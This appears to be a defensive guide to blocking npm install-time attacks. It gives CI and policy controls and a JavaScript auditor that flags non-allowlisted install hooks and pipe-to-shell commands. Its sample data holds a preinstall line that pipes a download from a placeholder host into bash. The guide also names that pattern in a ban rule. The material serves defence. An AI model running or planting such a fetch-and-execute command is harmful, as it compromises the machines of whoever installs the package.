
Mitigations That Actually Work

Practical controls to reduce install‑time attacks and surprise payloads.

CI patterns

  • Commit lockfiles and avoid floating ranges to prevent surprise upgrades.
  • Two‑phase installs: run npm ci --ignore-scripts, then selectively run required build scripts for trusted packages.
  • Run builds/tests in containers with --network=none when feasible to block install‑time exfiltration.
  • Default CI env: set npm_config_ignore_scripts=true; allowlist specific packages to run scripts.
  • Restrict egress: allow only trusted domains (registry, GitHub Releases/CDN).

Policy & alerts

  • Block merges when risk score > threshold; require human review.
  • Alert on maintainer changes, repo archival, or unusual version churn.
  • Prefer reproducible builds and a transparent release process; watch for sudden obfuscation.
  • Require checksum/signature verification for any remote binaries.
  • Enforce an allowlist for postinstall usage; ban shell pipes like curl … | bash.
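
One way to enforce the install-script allowlist and the pipe-to-shell ban between the two install phases, as an added example that is not part of the original page. The function name, package names and URL are hypothetical; in CI the manifests would be the package.json files found under node_modules after npm ci --ignore-scripts.

```javascript
// Lifecycle hooks that npm runs automatically during `npm install` / `npm ci`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// A download piped straight into a shell, e.g. `curl … | bash`.
const PIPE_TO_SHELL = /\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b/i;

// manifests: parsed package.json objects; allowlist: package names trusted
// to run install scripts. Returns what to block and what may run in phase two.
// Caveat: a package with a binding.gyp and no install script gets an implicit
// `node-gyp rebuild`; that needs a file check and is not covered here.
function auditInstallScripts(manifests, allowlist) {
  const allowed = new Set(allowlist);
  const blocked = [];
  const approved = [];
  for (const m of manifests) {
    const scripts = m.scripts || {};
    const hooks = INSTALL_HOOKS.filter((h) => typeof scripts[h] === "string");
    if (hooks.length === 0) continue; // nothing runs at install time
    let clean = true;
    for (const hook of hooks) {
      const cmd = scripts[hook];
      // The pipe-to-shell ban applies even to allowlisted packages.
      const rule = PIPE_TO_SHELL.test(cmd) ? "pipe-to-shell"
        : allowed.has(m.name) ? null : "not-allowlisted";
      if (rule) {
        blocked.push({ pkg: m.name, hook, rule, cmd });
        clean = false;
      }
    }
    if (clean) approved.push(m.name);
  }
  return { blocked, approved };
}

// Constructed sample data (hypothetical package names and URL).
const ALLOWLIST = ["native-addon-example", "setup-example"];
const SAMPLE_MANIFESTS = [
  { name: "native-addon-example", scripts: { install: "node-gyp rebuild" } },
  { name: "tracker-example", scripts: { postinstall: "node collect.js" } },
  { name: "setup-example",
    scripts: { preinstall: "curl -fsSL https://example.invalid/setup.sh | bash" } },
  { name: "pure-js-example", scripts: { test: "node test.js" } },
];

const report = auditInstallScripts(SAMPLE_MANIFESTS, ALLOWLIST);
console.log(JSON.stringify(report, null, 2));
// A CI gate would fail the job when report.blocked is non-empty.
```

Only the names in approved are candidates for the second phase, where their build scripts are run explicitly.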